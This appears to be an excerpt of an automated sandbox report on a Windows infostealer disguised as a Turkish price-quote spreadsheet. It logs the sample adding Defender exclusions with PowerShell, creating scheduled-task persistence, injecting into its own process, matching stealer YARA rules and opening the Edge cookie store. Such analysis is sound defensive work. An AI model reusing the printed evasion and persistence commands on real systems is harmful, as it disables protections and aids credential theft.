                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YzkHZRBcm.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeMemory written: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeMemory written: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YzkHZRBcm.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D9.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess created: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpB2D1.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess created: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe "C:\Users\user\AppData\Roaming\YzkHZRBcm.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeQueries volume information: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeQueries volume information: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeQueries volume information: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeQueries volume information: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 14.2.YzkHZRBcm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7464, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7944, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: YzkHZRBcm.exe PID: 6504, type: MEMORYSTR
                    Source: Yara matchFile source: 14.2.YzkHZRBcm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7464, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: YzkHZRBcm.exe PID: 6504, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
